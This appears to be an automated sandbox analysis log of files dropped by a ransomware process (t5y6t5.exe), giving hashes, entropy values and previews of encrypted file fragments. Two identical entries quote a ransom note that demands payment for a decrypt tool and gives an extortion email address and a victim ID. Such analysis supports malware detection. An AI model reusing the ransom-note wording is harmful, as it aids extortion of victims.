                                                                                            SSDEEP:24:mCQ2078sOwcds89ECrsDkU7KgG7ru86YMqsySPu/ICRm9oxuAvL4yQNIFmnsjw:HQ2a8Vx9ECrsDkUFG7C8DwySijR0oxuT
                                                                                            MD5:3D2D220464393882A086FA71780A9AF6
                                                                                            SHA1:605A321E1187F4F0089BBDEBF8D97606E43EE094
                                                                                            SHA-256:25E5BCA17CE9A984B92F325498EE7BADB5478E6D166519A7B8E804A91E23D8FF
                                                                                            SHA-512:296AB993B0540F471D19856B48E47C60BDC68EF648668A55E1163EABB25554BE9E0B26ECA20A403DB25BF17E6A1C4895503DD4C9022D91F9E125C2D7518CD58A
                                                                                            Malicious:false
                                                                                            Preview:N...&r....\O.&....u.Rd.......VKmA:..>.Lj...M|...L._.&.........q..7=>`i...o.R........(o....R.j.S.0h.n.l.g....u.FK...6|...9..s....AW......{2..z..7...k.q.......b..h.B.FB.....4$...~4.+..<...."..........W.H=...'...9..&..r..;......Q...s.Isr.T...w..G...'.Q.....+..i...t..p].$..d+...l.3Gx.h..7o...}Q.|~.5c.&.l...1.i....H...5.1....H.....VEWz.4....Okf...2.r|J3.....&.Rh..v.SH-n8\:.5 ...[.g.....p.c..3...?:...L.S ks...qM;%.H.S..H9........\..6.....>..n...{.Y.j....n:.....;.io.'.+.z.....?..c.3....g2..v.y%..P........b..X..2.....7E.6y..5#.{N..I..A"]O/[.F:.>c.JP.N.Vm...v9`.n........Y"...q.XZb...{...Gfq.#...V.d.....Y.....+K4E....:.v.=..r.H...{.......x.zcU.9y.F<...x.....R/7..I..Go.#..c..7.j.i...uT.......O=..(...u.K.....6...w.-T.y.._...zh....0o^m..X.4{....\...)."Ig..e...wg..+.v.:..ch..B=.N..[..6.Ge}.eU.N..>&Fv..vqR*.....}..........`#....5`...F.........B.G....U..>.{.Mb..m.............U..DV..KC.v...m....Kb...#.a..}.xCN.Q...r1..}z=.............S..N...iO....%4. ...1~-..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.835970647286486
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:aSqDt47Y2800MGEa6Bz9V+7fjqbxPxsU7K03Ns+/4w3Yd4+LK9AwIfzmBd:a1R4M2e2+7L8xPxsA3Nsjw3Ye0qIfzmv
                                                                                            MD5:B67E3D7A253D2498F11A90A1C4ECAA87
                                                                                            SHA1:5E1CAE9DBCA1AA2AA5C3659A34FC2D884162E7DF
                                                                                            SHA-256:E4571AEE27B5B1EAE984093EBAF0A200F1AE4E7F61713105CE87998EDDFCCDA0
                                                                                            SHA-512:110C49DF2C6C54D107DC47C7B2C918E4B53479A715FE31E4F8146688F33A621E841A24EBA70225321D3D4478EE89F1CC0665C951E40798FCDF26C36399E8F53F
                                                                                            Malicious:false
                                                                                            Preview:.f....2...2.Q....0..Q..nf..F.j.....-.5JL.....h._..........y.....7G.../.....*...t..`G`....y.....'.....Gm.b....(:..O..........d.....[.../.Ru.)...c..-\E.w...kaz.....g.A<....n.?...$.y._~=M.Z....u:...E.....\8..H.L_}...:}.T.|...E....2.xi..b.....@...@.K.m.WVI..+:B".....A....lNa0.1.hG.^wU.._3I..*.....p...P61:.x<...@..Vs5J...1B.}.:...Y.q.9..b....3....c.?.U...0....F/aL..\.<F..$......>.[_Ln.nS.Q .Y..P..gQ.'..f..1.+.....,.....i..u*.}.3......\.|...s......dR..tTz$.>9...w&..Y.&..&...i.!..v._V.&....o.......EO.b...2...tDyv.....p.'...........3Z.h...zq.b[.2R>...".0?.$.y.J.`...QQ..._.U(..FA.B.G.O.q..h...o.zX.fy.........q...'.c.;vs........G..</Q?D....[....>....d....+...4m..{A]...G../............}].\...2U...`.G.x..N........^].9d.......Gq....P..Zy._.3.] ..Y...7...7...*.p~F!t.m/.=.R.m...p.!...ZNb/-.a.:i.n.L.#hS.....)58...c.(2..e.!....]/.m0.....G.\.......6D6.t......0.Q..C.&.*3..B4..x...9..s.&YVW]t[.>.;........=0;.R.$.{.n...L.8.#$m...h.`'/..2...}.k..af.J.p].6..UTI.j8....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.835970647286486
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:aSqDt47Y2800MGEa6Bz9V+7fjqbxPxsU7K03Ns+/4w3Yd4+LK9AwIfzmBd:a1R4M2e2+7L8xPxsA3Nsjw3Ye0qIfzmv
                                                                                            MD5:B67E3D7A253D2498F11A90A1C4ECAA87
                                                                                            SHA1:5E1CAE9DBCA1AA2AA5C3659A34FC2D884162E7DF
                                                                                            SHA-256:E4571AEE27B5B1EAE984093EBAF0A200F1AE4E7F61713105CE87998EDDFCCDA0
                                                                                            SHA-512:110C49DF2C6C54D107DC47C7B2C918E4B53479A715FE31E4F8146688F33A621E841A24EBA70225321D3D4478EE89F1CC0665C951E40798FCDF26C36399E8F53F
                                                                                            Malicious:false
                                                                                            Preview:.f....2...2.Q....0..Q..nf..F.j.....-.5JL.....h._..........y.....7G.../.....*...t..`G`....y.....'.....Gm.b....(:..O..........d.....[.../.Ru.)...c..-\E.w...kaz.....g.A<....n.?...$.y._~=M.Z....u:...E.....\8..H.L_}...:}.T.|...E....2.xi..b.....@...@.K.m.WVI..+:B".....A....lNa0.1.hG.^wU.._3I..*.....p...P61:.x<...@..Vs5J...1B.}.:...Y.q.9..b....3....c.?.U...0....F/aL..\.<F..$......>.[_Ln.nS.Q .Y..P..gQ.'..f..1.+.....,.....i..u*.}.3......\.|...s......dR..tTz$.>9...w&..Y.&..&...i.!..v._V.&....o.......EO.b...2...tDyv.....p.'...........3Z.h...zq.b[.2R>...".0?.$.y.J.`...QQ..._.U(..FA.B.G.O.q..h...o.zX.fy.........q...'.c.;vs........G..</Q?D....[....>....d....+...4m..{A]...G../............}].\...2U...`.G.x..N........^].9d.......Gq....P..Zy._.3.] ..Y...7...7...*.p~F!t.m/.=.R.m...p.!...ZNb/-.a.:i.n.L.#hS.....)58...c.(2..e.!....]/.m0.....G.\.......6D6.t......0.Q..C.&.*3..B4..x...9..s.&YVW]t[.>.;........=0;.R.$.{.n...L.8.#$m...h.`'/..2...}.k..af.J.p].6..UTI.j8....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.857661372396012
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Mitn916QvHpARPgDO+UbVyKN0Q1ranBUz8DDPCvQOpnup:MikQvyysbVJN0ES0cPCNup
                                                                                            MD5:1717C6D252A97261CC9AE5FF54ECEC0C
                                                                                            SHA1:CF2ADCF79099BF690737592BA61D0C0BA241F572
                                                                                            SHA-256:A174F9B596DD57B41131837FB2B8424A1FD326F4EA36739D26F014369E9FC4C3
                                                                                            SHA-512:35A488A789F0DD9DC324C2B705A08047AC6EB0A32ED83C324CD167B0DF58A29210FBC60336C987CBC35BFBF6F9C397F95A7ADB06D9BF857CE91ABD0901F5647E
                                                                                            Malicious:false
                                                                                            Preview:.!9.....7...*!.9g.M2..E! ..NMR.".%.a.i..!^......./..I....x.=..Q=?S....D{.. #....D.x.mV.....?5...FUlH....Z......"....f..8.r.....[....J..2]x.J.{/u-Y...'..T..V......89)l6..2..L.R7.4y...D\.6...>.5GdQjj.O.I.C|S.,.<!...C..q,bJ...x..H8.qC. |1.^..h...|o.{...N...d.Q\L3s...W..Y(y..[D........c...k...t.].w.X..H.u.,...Q....D.7.a}..)0H.........W.>...z.7...2.+F.z..-3.S.b..-..d$4FK.c.?.....u..wmq...{].)..(!.3._S...<..5.g.>U.v.8....8......o\....)..F9.l..G. (..7E..;.T_c..|.o...TZ.H....".%.|J&,..s.r...........6..0.}...k....'..*n.+./.Km..h..^>.+.$Gt.05.9...^..Y..<tKz.'.<.VVU(.U{v.2T.".....P....E....:..E;i.]/..K.....@.6|...#$..Y.c..l..yg../p...%..0B|p\...<7.........N...B..w.vHM....!.~;0....>..x.>y...m\.i...Yr....P]....rU.>..$.J)....l.....y...i...).*e^sK2..T-$.......O.NN.............(...^R....j..`.L.h.....L.b_.@h...Z.....2.y=(&!Kf..k.......(...6.Y...w.FiY..%...a\S>.+.=7...........%....V./Ot.mW.s3..J..m...5l@.g.!.p.....|.......l.Z.....S...........pg...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.857661372396012
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Mitn916QvHpARPgDO+UbVyKN0Q1ranBUz8DDPCvQOpnup:MikQvyysbVJN0ES0cPCNup
                                                                                            MD5:1717C6D252A97261CC9AE5FF54ECEC0C
                                                                                            SHA1:CF2ADCF79099BF690737592BA61D0C0BA241F572
                                                                                            SHA-256:A174F9B596DD57B41131837FB2B8424A1FD326F4EA36739D26F014369E9FC4C3
                                                                                            SHA-512:35A488A789F0DD9DC324C2B705A08047AC6EB0A32ED83C324CD167B0DF58A29210FBC60336C987CBC35BFBF6F9C397F95A7ADB06D9BF857CE91ABD0901F5647E
                                                                                            Malicious:false
                                                                                            Preview:.!9.....7...*!.9g.M2..E! ..NMR.".%.a.i..!^......./..I....x.=..Q=?S....D{.. #....D.x.mV.....?5...FUlH....Z......"....f..8.r.....[....J..2]x.J.{/u-Y...'..T..V......89)l6..2..L.R7.4y...D\.6...>.5GdQjj.O.I.C|S.,.<!...C..q,bJ...x..H8.qC. |1.^..h...|o.{...N...d.Q\L3s...W..Y(y..[D........c...k...t.].w.X..H.u.,...Q....D.7.a}..)0H.........W.>...z.7...2.+F.z..-3.S.b..-..d$4FK.c.?.....u..wmq...{].)..(!.3._S...<..5.g.>U.v.8....8......o\....)..F9.l..G. (..7E..;.T_c..|.o...TZ.H....".%.|J&,..s.r...........6..0.}...k....'..*n.+./.Km..h..^>.+.$Gt.05.9...^..Y..<tKz.'.<.VVU(.U{v.2T.".....P....E....:..E;i.]/..K.....@.6|...#$..Y.c..l..yg../p...%..0B|p\...<7.........N...B..w.vHM....!.~;0....>..x.>y...m\.i...Yr....P]....rU.>..$.J)....l.....y...i...).*e^sK2..T-$.......O.NN.............(...^R....j..`.L.h.....L.b_.@h...Z.....2.y=(&!Kf..k.......(...6.Y...w.FiY..%...a\S>.+.=7...........%....V./Ot.mW.s3..J..m...5l@.g.!.p.....|.......l.Z.....S...........pg...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.856008285920204
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Y8XGY89wt8HIfDYUv9CGeSlf8uMo2oNIY5OrrWfuUACVs1S:Y8Xz87kMUUGZIYcr4nJ
                                                                                            MD5:7EE4BCA6ABB25562F0E884057C44B7FE
                                                                                            SHA1:0025AA7C2BAF2E798B3DFC4C7F5E1223056095B6
                                                                                            SHA-256:4D8C20DA6E8D371C72C40A98002E435EE34FBB3FE68A4FDBE775FF729A4AEE30
                                                                                            SHA-512:20507A5A280E4AD0167FD29D5A95758D5E21703054AD2336CD29CC62BDEA6EC8FA257850C088154522838E595D76711249E14B6F9956CF3DD9E61907C4CD5A4A
                                                                                            Malicious:false
                                                                                            Preview::=!.kH..U.....E.On....b...hF..s......<A+..7..j..2Q$a..\.Q.`.1..F...~I{(..h.'..2pq.....^W.....!....\f.z...TB.....\....i.6..T2.<.....)v..G%...../.n.\..Q...# ......I..s~..6&B..ld)e.'..|...N..........f.-.7.`.*^....%Z^..{.<.}.z}.........V......h.e..5*!k..w.qg.N...i.F.K......jhu._..ke..S..:..J....X..`.....-0..z....?...S.O.<a..V....D...C.T....y.I....*...,..w8.c"....qr#..f..Z...$..(..M.u..p..b.`.....)....d/knD....$A...5VD.U..?.0.J..T.(~%P..OL.p}:Fi..=..o.4.-U/:.bY .v...%n.l4Y!.*.m.V.w.N,H.*.......1S.J...J...x...9.l*...L.v....>ZC...%~....y.!.$.-...3.K.j..='a.C....N.).....wn.....".?...p.....z.9a..@....u...@....~..^E.....@->.%&.Mp.z33.X:`K..."....W...B00...>.p.q&V].....Z....zi.l.....~..(1.t...a.....%.8..x^.UA\C...N..t.f>..y...p..<...(Rp.}.mzs..&*../u.h...p..1..h.=.......l...!t..X...n...k..Q.....@`.Ws..R..4.~R.......0.+...;+....A.........`....lY...T...h...-...ER.U.Q.y..k...@.w..3.+....M'.5[d.lr...I..u....j1d.w.p3;X.$x[...#j........v...$*..M.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.856008285920204
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Y8XGY89wt8HIfDYUv9CGeSlf8uMo2oNIY5OrrWfuUACVs1S:Y8Xz87kMUUGZIYcr4nJ
                                                                                            MD5:7EE4BCA6ABB25562F0E884057C44B7FE
                                                                                            SHA1:0025AA7C2BAF2E798B3DFC4C7F5E1223056095B6
                                                                                            SHA-256:4D8C20DA6E8D371C72C40A98002E435EE34FBB3FE68A4FDBE775FF729A4AEE30
                                                                                            SHA-512:20507A5A280E4AD0167FD29D5A95758D5E21703054AD2336CD29CC62BDEA6EC8FA257850C088154522838E595D76711249E14B6F9956CF3DD9E61907C4CD5A4A
                                                                                            Malicious:false
                                                                                            Preview::=!.kH..U.....E.On....b...hF..s......<A+..7..j..2Q$a..\.Q.`.1..F...~I{(..h.'..2pq.....^W.....!....\f.z...TB.....\....i.6..T2.<.....)v..G%...../.n.\..Q...# ......I..s~..6&B..ld)e.'..|...N..........f.-.7.`.*^....%Z^..{.<.}.z}.........V......h.e..5*!k..w.qg.N...i.F.K......jhu._..ke..S..:..J....X..`.....-0..z....?...S.O.<a..V....D...C.T....y.I....*...,..w8.c"....qr#..f..Z...$..(..M.u..p..b.`.....)....d/knD....$A...5VD.U..?.0.J..T.(~%P..OL.p}:Fi..=..o.4.-U/:.bY .v...%n.l4Y!.*.m.V.w.N,H.*.......1S.J...J...x...9.l*...L.v....>ZC...%~....y.!.$.-...3.K.j..='a.C....N.).....wn.....".?...p.....z.9a..@....u...@....~..^E.....@->.%&.Mp.z33.X:`K..."....W...B00...>.p.q&V].....Z....zi.l.....~..(1.t...a.....%.8..x^.UA\C...N..t.f>..y...p..<...(Rp.}.mzs..&*../u.h...p..1..h.=.......l...!t..X...n...k..Q.....@`.Ws..R..4.~R.......0.+...;+....A.........`....lY...T...h...-...ER.U.Q.y..k...@.w..3.+....M'.5[d.lr...I..u....j1d.w.p3;X.$x[...#j........v...$*..M.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.839967991292206
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:HkBprZHy+Us242USCa4T+4Fpl5D4prOEMJsg64gOphDVvSJmiB1p7IX:H8ZHGYTN3f66EGBBgO7DVvSBN7g
                                                                                            MD5:F4F5B7CB0D76E04BF6BE774596532083
                                                                                            SHA1:DD9C1E61E425003C4A384B24355A5DC028E60818
                                                                                            SHA-256:D6871308C312079677E662F62703E9D3A1E59E2C187D933F89A13C4A64CC8376
                                                                                            SHA-512:9CB1F3D03209C1CB7E5CC341011332D732CE11DFD59F54CFB783814B56B71D5F6FA4947D140BC52ABDE9ECBDF603F2128EF194C43C2F87D58CE9ACD5A5B687ED
                                                                                            Malicious:false
                                                                                            Preview:.P.@W......Y......66.(..H.O..L...:lY.".......S...cB.k.Q..0rpI..-....0..L.X".S.5R.xd.....F.0..H...3.....j.jRV.5^.....'fn..6....i.Z..s.J.....e(.v...n.....P..e{.X..2..f.Q..C..?g X./.sZ...p.H.l.......|&..f..>....:.%.lI.MKQ.C.I_.TKO.G@.{...,.\ .P...7....=W......cK.:...........Z...iu....^...d...oL.x.g8J..S.gTY`.uV...\.....b.D\.2.\'..s.........L...oI.XF~..()[.%....+4.]x[.Hf2D....s..@G.k.h.J..M..`...J|.O2...d.;........S..F.......~...U.?...c.D.KB......-.].r.V$.C4..V}`..._itmp.R. .5/.a!H...o..z#..s9{...7...h.#}.sLn[....`.....*.8...XU..f.\..w.j.8...^.x...WO.}.=..\.3j.FV....}FR...~.E..?.,..{.......Y...>..'.*..x.n..q....".BZ...`t...b....).RB.L<-..(..z..F.n.q.D.Gf..c;#.'........I.M8.*D.:#..s}..n.S.....Q....c]._j<.....sw..".$.a.i;.+2$.3...5.....Y..EL.6M{.w...........E.CS.a.M.{..D.x.]3.zuk....,...Id.l...O....D`Vf7.......3.H0s.....JIp^...~g...........5.$.D..I..#B)X.^l i..s.K.:..-Z&0i...3.c....,..r~.l.p.A.8.:..CCn.Y......;M.*q...=]x...-.x....9Z~t..Rh..R...Z>D.0.Fk.|..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.839967991292206
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:HkBprZHy+Us242USCa4T+4Fpl5D4prOEMJsg64gOphDVvSJmiB1p7IX:H8ZHGYTN3f66EGBBgO7DVvSBN7g
                                                                                            MD5:F4F5B7CB0D76E04BF6BE774596532083
                                                                                            SHA1:DD9C1E61E425003C4A384B24355A5DC028E60818
                                                                                            SHA-256:D6871308C312079677E662F62703E9D3A1E59E2C187D933F89A13C4A64CC8376
                                                                                            SHA-512:9CB1F3D03209C1CB7E5CC341011332D732CE11DFD59F54CFB783814B56B71D5F6FA4947D140BC52ABDE9ECBDF603F2128EF194C43C2F87D58CE9ACD5A5B687ED
                                                                                            Malicious:false
                                                                                            Preview:.P.@W......Y......66.(..H.O..L...:lY.".......S...cB.k.Q..0rpI..-....0..L.X".S.5R.xd.....F.0..H...3.....j.jRV.5^.....'fn..6....i.Z..s.J.....e(.v...n.....P..e{.X..2..f.Q..C..?g X./.sZ...p.H.l.......|&..f..>....:.%.lI.MKQ.C.I_.TKO.G@.{...,.\ .P...7....=W......cK.:...........Z...iu....^...d...oL.x.g8J..S.gTY`.uV...\.....b.D\.2.\'..s.........L...oI.XF~..()[.%....+4.]x[.Hf2D....s..@G.k.h.J..M..`...J|.O2...d.;........S..F.......~...U.?...c.D.KB......-.].r.V$.C4..V}`..._itmp.R. .5/.a!H...o..z#..s9{...7...h.#}.sLn[....`.....*.8...XU..f.\..w.j.8...^.x...WO.}.=..\.3j.FV....}FR...~.E..?.,..{.......Y...>..'.*..x.n..q....".BZ...`t...b....).RB.L<-..(..z..F.n.q.D.Gf..c;#.'........I.M8.*D.:#..s}..n.S.....Q....c]._j<.....sw..".$.a.i;.+2$.3...5.....Y..EL.6M{.w...........E.CS.a.M.{..D.x.]3.zuk....,...Id.l...O....D`Vf7.......3.H0s.....JIp^...~g...........5.$.D..I..#B)X.^l i..s.K.:..-Z&0i...3.c....,..r~.l.p.A.8.:..CCn.Y......;M.*q...=]x...-.x....9Z~t..Rh..R...Z>D.0.Fk.|..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.860714438769984
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ta3oU/jwGDLUAlT+GmPTg7tZ6npa4aMGj+xfdS8i/loRsB9QmAnD9:ta4U7wGDL9lnmPu6p0jmfdId1bQB
                                                                                            MD5:3E7EF0B5710F7A1EF598DC430F2ECFCA
                                                                                            SHA1:4022EE81BB0D2CFC616945E732B1CF6A8468EDA6
                                                                                            SHA-256:89EF7EE105004FEE341E0C1E5B55229C743C649BF80CD913E6DF2DA133314CD1
                                                                                            SHA-512:9F1C09435FCECA52B2963745D318408DBC2BDDE8114BA83EEB7354AFBB558EEA096609166CFF84B8CB7B623DB1758F597105DB0F60AC484467E440A81F18847C
                                                                                            Malicious:false
                                                                                            Preview:%R{,...`.d.H1{.PL......jN.[.....z.....5.@.|......8..q...Pt.=......~.p..\.\...>.3..X1.g.y..(.........9....{....6.9w..Pd.r....,....G..V.D.......``..Wo.7:E.B...{.,..I....f0.S..W....&.dg..it2...W..o.1.8..y.Q..Hh7qfd..mmL.e.EG....m.......b.......R.eZ.@*..>SZ?.,..D\.:G.t.'.)..%..2...S..>..=..o..)5.+...b4.\DF.........p.f._y.*........1.}.....U.g\..._..(.;.s.I..[...vT{.....T=..Ep..........,..)(=.x.!...*..W...U0...............(......oDr..;..%#..G...(\.N5...t-..h.;N,.H$J..Q..Un.oB.J.O.A..KQ...$......o(%...fC.pjgX..6...F.......xu.0.y....zHd.Uj.<l(.|......u......K.. .0..pC<..d.pR...y.P..d...D..3t^+..H..MP..=.%.0A......U......_.....@..;.c.......gf {...Fp"..h..X7.Y.....\.....T..S.....9.r..2........3..<.~..G....<&s.4..U.!L.......H...........D..P..~......*..J.&.v.....Db..).d}......6.Q.J7{s.m........1.Z..../=.......>...J....1..h/.z.8....0"....w....{..R...a!..H.j.N..F...:..\.../.`..........j...Lk.W........o...R .... ....DKp4.',...@.......J7....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.860714438769984
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ta3oU/jwGDLUAlT+GmPTg7tZ6npa4aMGj+xfdS8i/loRsB9QmAnD9:ta4U7wGDL9lnmPu6p0jmfdId1bQB
                                                                                            MD5:3E7EF0B5710F7A1EF598DC430F2ECFCA
                                                                                            SHA1:4022EE81BB0D2CFC616945E732B1CF6A8468EDA6
                                                                                            SHA-256:89EF7EE105004FEE341E0C1E5B55229C743C649BF80CD913E6DF2DA133314CD1
                                                                                            SHA-512:9F1C09435FCECA52B2963745D318408DBC2BDDE8114BA83EEB7354AFBB558EEA096609166CFF84B8CB7B623DB1758F597105DB0F60AC484467E440A81F18847C
                                                                                            Malicious:false
                                                                                            Preview:%R{,...`.d.H1{.PL......jN.[.....z.....5.@.|......8..q...Pt.=......~.p..\.\...>.3..X1.g.y..(.........9....{....6.9w..Pd.r....,....G..V.D.......``..Wo.7:E.B...{.,..I....f0.S..W....&.dg..it2...W..o.1.8..y.Q..Hh7qfd..mmL.e.EG....m.......b.......R.eZ.@*..>SZ?.,..D\.:G.t.'.)..%..2...S..>..=..o..)5.+...b4.\DF.........p.f._y.*........1.}.....U.g\..._..(.;.s.I..[...vT{.....T=..Ep..........,..)(=.x.!...*..W...U0...............(......oDr..;..%#..G...(\.N5...t-..h.;N,.H$J..Q..Un.oB.J.O.A..KQ...$......o(%...fC.pjgX..6...F.......xu.0.y....zHd.Uj.<l(.|......u......K.. .0..pC<..d.pR...y.P..d...D..3t^+..H..MP..=.%.0A......U......_.....@..;.c.......gf {...Fp"..h..X7.Y.....\.....T..S.....9.r..2........3..<.~..G....<&s.4..U.!L.......H...........D..P..~......*..J.&.v.....Db..).d}......6.Q.J7{s.m........1.Z..../=.......>...J....1..h/.z.8....0"....w....{..R...a!..H.j.N..F...:..\.../.`..........j...Lk.W........o...R .... ....DKp4.',...@.......J7....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.834078513466776
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:hGjUxBRFlKXgpSPgldA1jXtB753mx44irP0uFYpIc3orrq57zZB1mH:kjUrpS4Ub552x41rKV33nmH
                                                                                            MD5:8A8E79B02733B0D81D6A6536041A5A2F
                                                                                            SHA1:2C1A044D50E298714718D685B419F9B30957C8FB
                                                                                            SHA-256:425B1EE5944F45ECFEA9B78E962F1DFBF93771574FBD99B77E0DCF3FA867B947
                                                                                            SHA-512:411E1829A4672361E54108ABB5BD63D47C440061A99E8E18BD21C13BFA64C1BE8DDEEA74B758830B6BBBF39CAEF37BC84B2FE4229F096D3CEEE323A88D8558B7
                                                                                            Malicious:false
                                                                                            Preview:..I........Q..E..c..X.{o......J...7.<)#...r....'..).0....!.T..Z...O..........l.P.O.Z5$[..+....=6yBG.Ej..<4.....u.L....IV.n..S..)..n...q...?,.X..O......|..........H..]]j..;.W`GO..?.'.H.............7..GC.[....%..z..].......P....0....{6_...=.U.t.h.a.Rj0...T..zE4...g......-\..,..P=<.....S..P..7h....ec..o.^.ST....0.f...Y~......J...&.........Ya1o).%.-...4......u....9.i,.e*..b&9Y..<\..HZ..@..........0P%@.KIe.E.....1.E....u..G..N.mC..l..n..ax.+...^..cC..>BP......Q#.[.n.4=.......k......T...9..Q.K.d..l.V%.5....}....]......DK......l..c(.o.U.&....#.P.)..)....T..k./.v.vq....(......<R...x..Kz..Hp.].yjU%..X.4..~b[...A.[..;+.j....E.....91..!N......)...d...b.a-....J..Vp.0/..?..rS.1..hC-d....(...L..j.....td....-.c.g..X.1..#.....:....K.jL...!.='..\u....1\+.O...-.?...{._.N..R..K......Q.lm...u...!..T..a..R.3..uuB.....T...ft.......Q.........`.GC...U....E|/M.`U..U,.....}.....Y.\.XrC.....&...T.....Q...M{.1.+D..p.....B..rO.(+vK........$..@c.h.:...w..hj...6]
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.834078513466776
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:hGjUxBRFlKXgpSPgldA1jXtB753mx44irP0uFYpIc3orrq57zZB1mH:kjUrpS4Ub552x41rKV33nmH
                                                                                            MD5:8A8E79B02733B0D81D6A6536041A5A2F
                                                                                            SHA1:2C1A044D50E298714718D685B419F9B30957C8FB
